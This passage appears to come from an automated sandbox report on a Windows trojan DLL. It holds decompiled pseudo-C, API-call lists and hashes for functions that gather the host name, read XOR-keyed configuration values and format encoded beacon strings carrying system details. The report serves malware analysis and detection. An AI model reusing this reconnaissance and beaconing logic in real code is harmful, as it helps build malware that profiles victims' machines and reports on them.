                                                          • Opcode Fuzzy Hash: a08929bb598a79731458387abda47529e5c1de2e0bb3821e9b99d7ab14aae079
                                                          • Instruction Fuzzy Hash: 32017132200209BAEB21AFA4DC44E9F7F7DEF84754F204435FE009A160DA71E964DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 37%
                                                          			E049558DB(void* __ecx) {
                                                          				signed int _v8;
                                                          				void* _t15;
                                                          				void* _t19;
                                                          				void* _t20;
                                                          				void* _t22;
                                                          				intOrPtr* _t23;
                                                          
                                                          				_t23 = __imp__;
                                                          				_t20 = 0;
                                                          				_v8 = _v8 & 0;
                                                          				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                                                          				_t10 = _v8;
                                                          				if(_v8 != 0) {
                                                          					_t20 = E0495A71F(_t10 + 1);
                                                          					if(_t20 != 0) {
                                                          						_t15 =  *_t23(3, _t20,  &_v8); // executed
                                                          						if(_t15 != 0) {
                                                          							 *((char*)(_v8 + _t20)) = 0;
                                                          						} else {
                                                          							E0495A734(_t20);
                                                          							_t20 = 0;
                                                          						}
                                                          					}
                                                          				}
                                                          				return _t20;
                                                          			}

                                                          APIs
                                                          • GetComputerNameExA.KERNELBASE(00000003,00000000,04951FA0,74B5F710,00000000,?,?,04951FA0), ref: 049558F3
                                                            • Part of subcall function 0495A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04955595), ref: 0495A72B
                                                          • GetComputerNameExA.KERNELBASE(00000003,00000000,04951FA0,04951FA1,?,?,04951FA0), ref: 04955910
                                                            • Part of subcall function 0495A734: HeapFree.KERNEL32(00000000,00000000,04955637,00000000,?,?,00000000), ref: 0495A740
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: ComputerHeapName$AllocateFree
                                                          • String ID:
                                                          • API String ID: 187446995-0
                                                          • Opcode ID: 089a86f9d79610d7eed419d65382a93232b6654ef04eaccbd1aa240fb5a1c401
                                                          • Instruction ID: 0a87888db34e3fbf66dcf4baa558ff22ffdb0964e8aadd9ad35e57773c7d29d9
                                                          • Opcode Fuzzy Hash: 089a86f9d79610d7eed419d65382a93232b6654ef04eaccbd1aa240fb5a1c401
                                                          • Instruction Fuzzy Hash: 9EF0902AA00205BAEB11D6A98C10EAF66BDDBC4620F320079E900E3105EA74EA01C760
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                          				intOrPtr _t4;
                                                          				void* _t10;
                                                          				void* _t11;
                                                          				void* _t12;
                                                          				void* _t14;
                                                          
                                                          				_t14 = 1;
                                                          				_t4 = _a8;
                                                          				if(_t4 == 0) {
                                                          					if(InterlockedDecrement(0x495d23c) == 0) {
                                                          						E04951B42();
                                                          					}
                                                          				} else {
                                                          					if(_t4 == 1 && InterlockedIncrement(0x495d23c) == 1) {
                                                          						_t10 = E049512E5(_t11, _t12, _a4); // executed
                                                          						if(_t10 != 0) {
                                                          							_t14 = 0;
                                                          						}
                                                          					}
                                                          				}
                                                          				return _t14;
                                                          			}









                                                          APIs
                                                          • InterlockedIncrement.KERNEL32(0495D23C), ref: 04954EDF
                                                            • Part of subcall function 049512E5: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,04954EF2,?), ref: 049512F8
                                                          • InterlockedDecrement.KERNEL32(0495D23C), ref: 04954EFF
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Interlocked$CreateDecrementHeapIncrement
                                                          • String ID:
                                                          • API String ID: 3834848776-0
                                                          • Opcode ID: 0642249df72cd5a0bf639020846c7f4965d69ad2ced398fc3f352c0f08f94f1f
                                                          • Instruction ID: 252b173115e74d04d2ebc5cb78fe3a1175e7538040a8e3dbd80a879c1fc2a32a
                                                          • Opcode Fuzzy Hash: 0642249df72cd5a0bf639020846c7f4965d69ad2ced398fc3f352c0f08f94f1f
                                                          • Instruction Fuzzy Hash: D7E0482128823557A761DE789909B5A954A9FC1754F318534EC8AD1030D610F8809795
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 88%
                                                          			E04951AE2(intOrPtr* __edi) {
                                                          				intOrPtr _v8;
                                                          				char _v12;
                                                          				intOrPtr _v16;
                                                          				intOrPtr _t15;
                                                          				intOrPtr* _t21;
                                                          
                                                          				_t21 = __edi;
                                                          				_push( &_v12);
                                                          				_push(__edi);
                                                          				_v8 = 0x1d4c0;
                                                          				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
                                                          				while(1) {
                                                          					_v16 = _t15;
                                                          					Sleep(0x1f4); // executed
                                                          					if(_v12 == 4) {
                                                          						break;
                                                          					}
                                                          					if(_v8 == 0) {
                                                          						L4:
                                                          						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
                                                          						continue;
                                                          					} else {
                                                          						if(_v8 <= 0x1f4) {
                                                          							_v16 = 0x80004004;
                                                          						} else {
                                                          							_v8 = _v8 - 0x1f4;
                                                          							goto L4;
                                                          						}
                                                          					}
                                                          					L8:
                                                          					return _v16;
                                                          				}
                                                          				goto L8;
                                                          			}









                                                          APIs
                                                          • Sleep.KERNELBASE(000001F4), ref: 04951B2A
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          • Opcode ID: 039372dd4edb7104c30c53a2d4dc6c06b6ff855e438add9c96040cef4064c08a
                                                          • Instruction ID: 09556ff530ee65baab4cc6cc9d8feb391449489c0017a094f6c08648eac5061f
                                                          • Opcode Fuzzy Hash: 039372dd4edb7104c30c53a2d4dc6c06b6ff855e438add9c96040cef4064c08a
                                                          • Instruction Fuzzy Hash: 4FF0E775D01218EFDB00DB94D589AEDB7B8EF04305F2484BAE902A7254E7B46B84DF61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          C-Code - Quality: 95%
                                                          			E0495888E(int* __ecx) {
                                                          				int _v8;
                                                          				void* _v12;
                                                          				void* _v16;
                                                          				void* __esi;
                                                          				signed int _t26;
                                                          				signed int _t31;
                                                          				signed int _t37;
                                                          				char* _t43;
                                                          				char* _t44;
                                                          				char* _t45;
                                                          				char* _t46;
                                                          				char* _t47;
                                                          				void* _t48;
                                                          				void* _t49;
                                                          				void* _t50;
                                                          				intOrPtr _t51;
                                                          				void* _t53;
                                                          				intOrPtr _t54;
                                                          				intOrPtr _t55;
                                                          				signed int _t58;
                                                          				intOrPtr _t61;
                                                          				signed int _t62;
                                                          				signed int _t67;
                                                          				void* _t69;
                                                          				void* _t70;
                                                          				signed int _t72;
                                                          				signed int _t76;
                                                          				signed int _t80;
                                                          				signed int _t84;
                                                          				signed int _t88;
                                                          				signed int _t92;
                                                          				void* _t97;
                                                          				intOrPtr _t114;
                                                          
                                                          				_t98 = __ecx;
                                                          				_t26 =  *0x495d2a4; // 0x63699bc3
                                                          				if(E04957145( &_v8,  &_v12, _t26 ^ 0x8241c5a7) != 0 && _v12 >= 0x90) {
                                                          					 *0x495d2d8 = _v8;
                                                          				}
                                                          				_t31 =  *0x495d2a4; // 0x63699bc3
                                                          				if(E04957145( &_v16,  &_v12, _t31 ^ 0x0b822240) == 0) {
                                                          					_v12 = 2;
                                                          					L62:
                                                          					return _v12;
                                                          				}
                                                          				_t37 =  *0x495d2a4; // 0x63699bc3
                                                          				if(E04957145( &_v12,  &_v8, _t37 ^ 0xecd84622) == 0) {
                                                          					L60:
                                                          					HeapFree( *0x495d238, 0, _v16);
                                                          					goto L62;
                                                          				} else {
                                                          					_t97 = _v12;
                                                          					if(_t97 == 0) {
                                                          						_t43 = 0;
                                                          					} else {
                                                          						_t92 =  *0x495d2a4; // 0x63699bc3
                                                          						_t43 = E04956B2E(_t98, _t97, _t92 ^ 0x724e87bc);
                                                          					}
                                                          					if(_t43 != 0) {
                                                          						_t98 =  &_v8;
                                                          						if(StrToIntExA(_t43, 0,  &_v8) != 0) {
                                                          							 *0x495d240 = _v8;
                                                          						}
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t44 = 0;
                                                          					} else {
                                                          						_t88 =  *0x495d2a4; // 0x63699bc3
                                                          						_t44 = E04956B2E(_t98, _t97, _t88 ^ 0x2b40cc40);
                                                          					}
                                                          					if(_t44 != 0) {
                                                          						_t98 =  &_v8;
                                                          						if(StrToIntExA(_t44, 0,  &_v8) != 0) {
                                                          							 *0x495d244 = _v8;
                                                          						}
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t45 = 0;
                                                          					} else {
                                                          						_t84 =  *0x495d2a4; // 0x63699bc3
                                                          						_t45 = E04956B2E(_t98, _t97, _t84 ^ 0x3b27c2e6);
                                                          					}
                                                          					if(_t45 != 0) {
                                                          						_t98 =  &_v8;
                                                          						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
                                                          							 *0x495d248 = _v8;
                                                          						}
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t46 = 0;
                                                          					} else {
                                                          						_t80 =  *0x495d2a4; // 0x63699bc3
                                                          						_t46 = E04956B2E(_t98, _t97, _t80 ^ 0x0602e249);
                                                          					}
                                                          					if(_t46 != 0) {
                                                          						_t98 =  &_v8;
                                                          						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
                                                          							 *0x495d004 = _v8;
                                                          						}
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t47 = 0;
                                                          					} else {
                                                          						_t76 =  *0x495d2a4; // 0x63699bc3
                                                          						_t47 = E04956B2E(_t98, _t97, _t76 ^ 0x3603764c);
                                                          					}
                                                          					if(_t47 != 0) {
                                                          						_t98 =  &_v8;
                                                          						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
                                                          							 *0x495d02c = _v8;
                                                          						}
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t48 = 0;
                                                          					} else {
                                                          						_t72 =  *0x495d2a4; // 0x63699bc3
                                                          						_t48 = E04956B2E(_t98, _t97, _t72 ^ 0x2cc1f2fd);
                                                          					}
                                                          					if(_t48 != 0) {
                                                          						_push(_t48);
                                                          						_t69 = 0x10;
                                                          						_t70 = E049556FA(_t69);
                                                          						if(_t70 != 0) {
                                                          							_push(_t70);
                                                          							E04956702();
                                                          						}
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t49 = 0;
                                                          					} else {
                                                          						_t67 =  *0x495d2a4; // 0x63699bc3
                                                          						_t49 = E04956B2E(_t98, _t97, _t67 ^ 0xb30fc035);
                                                          					}
                                                          					if(_t49 != 0 && E049556FA(0, _t49) != 0) {
                                                          						_t114 =  *0x495d32c; // 0x4dd95b0
                                                          						E049523F4(_t114 + 4, _t65);
                                                          					}
                                                          					if(_t97 == 0) {
                                                          						_t50 = 0;
                                                          					} else {
                                                          						_t62 =  *0x495d2a4; // 0x63699bc3
                                                          						_t50 = E04956B2E(_t98, _t97, _t62 ^ 0x372ab5b7);
                                                          					}
                                                          					if(_t50 == 0) {
                                                          						L52:
                                                          						_t51 =  *0x495d2a8; // 0x47a5a8
                                                          						_t20 = _t51 + 0x495e252; // 0x616d692f
                                                          						 *0x495d2d4 = _t20;
                                                          						goto L53;
                                                          					} else {
                                                          						_t61 = E049556FA(0, _t50);
                                                          						 *0x495d2d4 = _t61;
                                                          						if(_t61 != 0) {
                                                          							L53:
                                                          							if(_t97 == 0) {
                                                          								_t53 = 0;
                                                          							} else {
                                                          								_t58 =  *0x495d2a4; // 0x63699bc3
                                                          								_t53 = E04956B2E(_t98, _t97, _t58 ^ 0xd8dc5cde);
                                                          							}
                                                          							if(_t53 == 0) {
                                                          								_t54 =  *0x495d2a8; // 0x47a5a8
                                                          								_t21 = _t54 + 0x495e791; // 0x6976612e
                                                          								_t55 = _t21;
                                                          							} else {
                                                          								_t55 = E049556FA(0, _t53);
                                                          							}
                                                          							 *0x495d340 = _t55;
                                                          							HeapFree( *0x495d238, 0, _t97);
                                                          							_v12 = 0;
                                                          							goto L60;
                                                          						}
                                                          						goto L52;
                                                          					}
                                                          				}
                                                          			}




































                                                          0x04958aa2
                                                          0x04958aa7
                                                          0x04958aad
                                                          0x00000000
                                                          0x04958a91
                                                          0x04958a94
                                                          0x04958a99
                                                          0x04958aa0
                                                          0x04958ab2
                                                          0x04958ab4
                                                          0x04958aca
                                                          0x04958ab6
                                                          0x04958ab6
                                                          0x04958ac3
                                                          0x04958ac3
                                                          0x04958ace
                                                          0x04958ada
                                                          0x04958adf
                                                          0x04958adf
                                                          0x04958ad0
                                                          0x04958ad3
                                                          0x04958ad3
                                                          0x04958aed
                                                          0x04958af2
                                                          0x04958af8
                                                          0x00000000
                                                          0x04958af8
                                                          0x00000000
                                                          0x04958aa0
                                                          0x04958a8f

                                                          APIs
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04955D25,?,63699BC3,?,04955D25,63699BC3,?,04955D25,63699BC3,00000005,0495D00C,00000008), ref: 04958933
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04955D25,?,63699BC3,?,04955D25,63699BC3,?,04955D25,63699BC3,00000005,0495D00C,00000008), ref: 04958965
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04955D25,?,63699BC3,?,04955D25,63699BC3,?,04955D25,63699BC3,00000005,0495D00C,00000008), ref: 04958997
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04955D25,?,63699BC3,?,04955D25,63699BC3,?,04955D25,63699BC3,00000005,0495D00C,00000008), ref: 049589C9
                                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,04955D25,?,63699BC3,?,04955D25,63699BC3,?,04955D25,63699BC3,00000005,0495D00C,00000008), ref: 049589FB
                                                          • HeapFree.KERNEL32(00000000,04955D25,04955D25,?,63699BC3,?,04955D25,63699BC3,?,04955D25,63699BC3,00000005,0495D00C,00000008,?,04955D25), ref: 04958AF2
                                                          • HeapFree.KERNEL32(00000000,?,04955D25,?,63699BC3,?,04955D25,63699BC3,?,04955D25,63699BC3,00000005,0495D00C,00000008,?,04955D25), ref: 04958B05
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: 458d975d37b4fb2f00c42c28b0a04737fda1bbb5a9fd249002495aacca1397fe
                                                          • Instruction ID: a67f93c1d5bf899f257193d9619970b59a78425e3670f5210ee03205006149eb
                                                          • Opcode Fuzzy Hash: 458d975d37b4fb2f00c42c28b0a04737fda1bbb5a9fd249002495aacca1397fe
                                                          • Instruction Fuzzy Hash: 80717D74A04205AFEB10FBB9E984D5BBBEDEF883407344A31E806D7124E675FD528B61
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 66%
                                                          			E04951F13(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
                                                          				intOrPtr _v0;
                                                          				intOrPtr _v4;
                                                          				intOrPtr _v16;
                                                          				intOrPtr _v24;
                                                          				intOrPtr _v28;
                                                          				void* _v44;
                                                          				intOrPtr _v52;
                                                          				void* __edi;
                                                          				long _t25;
                                                          				intOrPtr _t26;
                                                          				intOrPtr _t27;
                                                          				intOrPtr _t28;
                                                          				intOrPtr _t29;
                                                          				intOrPtr _t30;
                                                          				void* _t33;
                                                          				intOrPtr _t34;
                                                          				int _t37;
                                                          				intOrPtr _t42;
                                                          				intOrPtr _t43;
                                                          				intOrPtr _t50;
                                                          				intOrPtr _t54;
                                                          				intOrPtr* _t56;
                                                          				intOrPtr _t62;
                                                          				intOrPtr _t68;
                                                          				intOrPtr _t71;
                                                          				intOrPtr _t74;
                                                          				int _t77;
                                                          				intOrPtr _t78;
                                                          				int _t81;
                                                          				intOrPtr _t83;
                                                          				int _t86;
                                                          				intOrPtr* _t89;
                                                          				intOrPtr* _t90;
                                                          				void* _t91;
                                                          				void* _t95;
                                                          				void* _t96;
                                                          				void* _t97;
                                                          				intOrPtr _t98;
                                                          				void* _t100;
                                                          				int _t101;
                                                          				void* _t102;
                                                          				void* _t103;
                                                          				void* _t105;
                                                          				void* _t106;
                                                          				void* _t108;
                                                          
                                                          				_t95 = __edx;
                                                          				_t91 = __ecx;
                                                          				_t25 = __eax;
                                                          				_t105 = _a16;
                                                          				_v4 = 8;
                                                          				if(__eax == 0) {
                                                          					_t25 = GetTickCount();
                                                          				}
                                                          				_t26 =  *0x495d018; // 0xf1c1aee9
                                                          				asm("bswap eax");
                                                          				_t27 =  *0x495d014; // 0x3a87c8cd
                                                          				asm("bswap eax");
                                                          				_t28 =  *0x495d010; // 0xd8d2f808
                                                          				asm("bswap eax");
                                                          				_t29 = E0495D00C; // 0xeec43f25
                                                          				asm("bswap eax");
                                                          				_t30 =  *0x495d2a8; // 0x47a5a8
                                                          				_t3 = _t30 + 0x495e633; // 0x74666f73
                                                          				_t101 = wsprintfA(_t105, _t3, 2, 0x3d15e, _t29, _t28, _t27, _t26,  *0x495d02c,  *0x495d004, _t25);
                                                          				_t33 = E049556CD();
                                                          				_t34 =  *0x495d2a8; // 0x47a5a8
                                                          				_t4 = _t34 + 0x495e673; // 0x74707526
                                                          				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
                                                          				_t108 = _t106 + 0x38;
                                                          				_t102 = _t101 + _t37;
                                                          				_t96 = E049558DB(_t91);
                                                          				if(_t96 != 0) {
                                                          					_t83 =  *0x495d2a8; // 0x47a5a8
                                                          					_t6 = _t83 + 0x495e8d4; // 0x736e6426
                                                          					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
                                                          					_t108 = _t108 + 0xc;
                                                          					_t102 = _t102 + _t86;
                                                          					HeapFree( *0x495d238, 0, _t96);
                                                          				}
                                                          				_t97 = E0495A199();
                                                          				if(_t97 != 0) {
                                                          					_t78 =  *0x495d2a8; // 0x47a5a8
                                                          					_t8 = _t78 + 0x495e8dc; // 0x6f687726
                                                          					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
                                                          					_t108 = _t108 + 0xc;
                                                          					_t102 = _t102 + _t81;
                                                          					HeapFree( *0x495d238, 0, _t97);
                                                          				}
                                                          				_t98 =  *0x495d32c; // 0x4dd95b0
                                                          				_a32 = E04954622(0x495d00a, _t98 + 4);
                                                          				_t42 =  *0x495d2d0; // 0x0
                                                          				if(_t42 != 0) {
                                                          					_t74 =  *0x495d2a8; // 0x47a5a8
                                                          					_t11 = _t74 + 0x495e8b6; // 0x3d736f26
                                                          					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
                                                          					_t108 = _t108 + 0xc;
                                                          					_t102 = _t102 + _t77;
                                                          				}
                                                          				_t43 =  *0x495d2cc; // 0x0
                                                          				if(_t43 != 0) {
                                                          					_t71 =  *0x495d2a8; // 0x47a5a8
                                                          					_t13 = _t71 + 0x495e88d; // 0x3d706926
                                                          					wsprintfA(_t102 + _t105, _t13, _t43);
                                                          				}
                                                          				if(_a32 != 0) {
                                                          					_t100 = RtlAllocateHeap( *0x495d238, 0, 0x800);
                                                          					if(_t100 != 0) {
                                                          						E0495518F(GetTickCount());
                                                          						_t50 =  *0x495d32c; // 0x4dd95b0
                                                          						__imp__(_t50 + 0x40);
                                                          						asm("lock xadd [eax], ecx");
                                                          						_t54 =  *0x495d32c; // 0x4dd95b0
                                                          						__imp__(_t54 + 0x40);
                                                          						_t56 =  *0x495d32c; // 0x4dd95b0
                                                          						_t103 = E04951BB6(1, _t95, _t105,  *_t56);
                                                          						asm("lock xadd [eax], ecx");
                                                          						if(_t103 != 0) {
                                                          							StrTrimA(_t103, 0x495c28c);
                                                          							_push(_t103);
                                                          							_t62 = E0495361A();
                                                          							_v16 = _t62;
                                                          							if(_t62 != 0) {
                                                          								_t89 = __imp__;
                                                          								 *_t89(_t103, _v0);
                                                          								 *_t89(_t100, _a4);
                                                          								_t90 = __imp__;
                                                          								 *_t90(_t100, _v28);
                                                          								 *_t90(_t100, _t103);
                                                          								_t68 = E04956777(0xffffffffffffffff, _t100, _v28, _v24);
                                                          								_v52 = _t68;
                                                          								if(_t68 != 0 && _t68 != 0x10d2) {
                                                          									E04956761();
                                                          								}
                                                          								HeapFree( *0x495d238, 0, _v44);
                                                          							}
                                                          							HeapFree( *0x495d238, 0, _t103);
                                                          						}
                                                          						HeapFree( *0x495d238, 0, _t100);
                                                          					}
                                                          					HeapFree( *0x495d238, 0, _a24);
                                                          				}
                                                          				HeapFree( *0x495d238, 0, _t105);
                                                          				return _a12;
                                                          			}



                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 04951F2A
                                                          • wsprintfA.USER32 ref: 04951F77
                                                          • wsprintfA.USER32 ref: 04951F94
                                                          • wsprintfA.USER32 ref: 04951FB7
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04951FC7
                                                          • wsprintfA.USER32 ref: 04951FE9
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04951FF9
                                                          • wsprintfA.USER32 ref: 04952030
                                                          • wsprintfA.USER32 ref: 04952050
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 0495206D
                                                          • GetTickCount.KERNEL32 ref: 0495207D
                                                          • RtlEnterCriticalSection.NTDLL(04DD9570), ref: 04952091
                                                          • RtlLeaveCriticalSection.NTDLL(04DD9570), ref: 049520AF
                                                            • Part of subcall function 04951BB6: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,049520C2,?,04DD95B0), ref: 04951BE1
                                                            • Part of subcall function 04951BB6: lstrlen.KERNEL32(?,?,?,049520C2,?,04DD95B0), ref: 04951BE9
                                                            • Part of subcall function 04951BB6: strcpy.NTDLL ref: 04951C00
                                                            • Part of subcall function 04951BB6: lstrcat.KERNEL32(00000000,?), ref: 04951C0B
                                                            • Part of subcall function 04951BB6: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,049520C2,?,04DD95B0), ref: 04951C28
                                                          • StrTrimA.SHLWAPI(00000000,0495C28C,?,04DD95B0), ref: 049520E1
                                                            • Part of subcall function 0495361A: lstrlen.KERNEL32(04DD9A78,00000000,00000000,7742C740,049520ED,00000000), ref: 0495362A
                                                            • Part of subcall function 0495361A: lstrlen.KERNEL32(?), ref: 04953632
                                                            • Part of subcall function 0495361A: lstrcpy.KERNEL32(00000000,04DD9A78), ref: 04953646
                                                            • Part of subcall function 0495361A: lstrcat.KERNEL32(00000000,?), ref: 04953651
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 04952100
                                                          • lstrcpy.KERNEL32(00000000,00000000), ref: 04952107
                                                          • lstrcat.KERNEL32(00000000,?), ref: 04952114
                                                          • lstrcat.KERNEL32(00000000,00000000), ref: 04952118
                                                            • Part of subcall function 04956777: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,74B481D0), ref: 04956829
                                                          • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 04952148
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 04952157
                                                          • HeapFree.KERNEL32(00000000,00000000,?,04DD95B0), ref: 04952166
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04952178
                                                          • HeapFree.KERNEL32(00000000,?), ref: 04952187
                                                          Memory Dump Source
                                                          • Source File: 00000025.00000002.425102345.0000000004951000.00000020.00000001.sdmp, Offset: 04950000, based on PE: true
                                                          • Associated: 00000025.00000002.425085830.0000000004950000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425131893.000000000495C000.00000002.00000001.sdmp
                                                          • Associated: 00000025.00000002.425153071.000000000495D000.00000004.00000001.sdmp
                                                          • Associated: 00000025.00000002.425189090.000000000495F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
                                                          • String ID:
                                                          • API String ID: 3080378247-0
                                                          • Opcode ID: 435064076b7e53778c2f9a382a0d12242c65efed213e8d7ff34fde38fcd01daf
                                                          • Instruction ID: 363be3cbec3a529a0df6d590f348a883bc087febd6bb425e421cd87ebd95c42b
                                                          • Opcode Fuzzy Hash: 435064076b7e53778c2f9a382a0d12242c65efed213e8d7ff34fde38fcd01daf
                                                          • Instruction Fuzzy Hash: 21617B31504300AFEB11EBA4EC48E567BECEB49354F344634FA08D6260DB39EC05DB66
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 27%
                                                          			E04956C38(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                          				intOrPtr _v8;
                                                          				intOrPtr _v12;
                                                          				long _v16;
                                                          				intOrPtr _v20;
                                                          				signed int _v24;
                                                          				void* __esi;
                                                          				long _t43;
                                                          				intOrPtr _t44;
                                                          				intOrPtr _t46;
                                                          				void* _t48;
                                                          				void* _t49;
                                                          				void* _t50;
                                                          				intOrPtr _t54;
                                                          				intOrPtr _t57;
                                                          				void* _t58;
                                                          				void* _t59;
                                                          				void* _t60;
                                                          				intOrPtr _t66;
                                                          				void* _t71;
                                                          				void* _t74;
                                                          				intOrPtr _t75;
                                                          				void* _t77;
                                                          				intOrPtr _t79;
                                                          				intOrPtr* _t80;
                                                          				intOrPtr _t91;
                                                          
                                                          				_t79 =  *0x495d33c; // 0x4dd9798
                                                          				_v24 = 8;
                                                          				_t43 = GetTickCount();
                                                          				_push(5);
                                                          				_t74 = 0xa;
                                                          				_v16 = _t43;
                                                          				_t44 = E0495A557(_t74,  &_v16);
                                                          				_v8 = _t44;
                                                          				if(_t44 == 0) {
                                                          					_v8 = 0x495c18c;
                                                          				}
                                                          				_t46 = E049518A5(_t79);
                                                          				_v12 = _t46;
                                                          				if(_t46 != 0) {
                                                          					_t80 = __imp__;
                                                          					_t48 =  *_t80(_v8, _t71);
                                                          					_t49 =  *_t80(_v12);
                                                          					_t50 =  *_t80(_a4);
                                                          					_t54 = E0495A71F(lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + lstrlenW(_a8) + _t48 + _t48 + _t49 + _t50 + 0x102);
                                                          					_v20 = _t54;
                                                          					if(_t54 != 0) {
                                                          						_t75 =  *0x495d2a8; // 0x47a5a8
                                                          						_t16 = _t75 + 0x495eb08; // 0x530025
                                                          						 *0x495d118(_t54, _t16, _v8, _v8, _a4, _v12, _a8);
                                                          						_push(4);
                                                          						_t77 = 5;
                                                          						_t57 = E0495A557(_t77,  &_v16);
                                                          						_v8 = _t57;
                                                          						if(_t57 == 0) {
                                                          							_v8 = 0x495c190;
                                                          						}
                                                          						_t58 =  *_t80(_v8);
                                                          						_t59 =  *_t80(_v12);
                                                          						_t60 =  *_t80(_a4);
                                                          						_t91 = E0495A71F(lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + lstrlenW(_a12) + _t58 + _t58 + _t59 + _t60 + 0x13a);
                                                          						if(_t91 == 0) {
                                                          							E0495A734(_v20);
                                                          						} else {
                                                          							_t66 =  *0x495d2a8; // 0x47a5a8
                                                          							_t31 = _t66 + 0x495ec28; // 0x73006d
                                                          							 *0x495d118(_t91, _t31, _v8, _v8, _a4, _v12, _a12);
                                                          							 *_a16 = _v20;
                                                          							_v24 = _v24 & 0x00000000;
                                                          							 *_a20 = _t91;
                                                          						}
                                                          					}
                                                          					E0495A734(_v12);
                                                          				}
                                                          				return _v24;
                                                          			}

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 04956C4D
                                                          • lstrlen.KERNEL32(?,80000002,00000005), ref: 04956C8D
                                                          • lstrlen.KERNEL32(00000000), ref: 04956C96
                                                          • lstrlen.KERNEL32(00000000), ref: 04956C9D
                                                          • lstrlenW.KERNEL32(80000002), ref: 04956CAA
                                                          • lstrlen.KERNEL32(?,00000004), ref: 04956D0A
                                                          • lstrlen.KERNEL32(?), ref: 04956D13
                                                          • lstrlen.KERNEL32(?), ref: 04956D1A
                                                          • lstrlenW.KERNEL32(?), ref: 04956D21
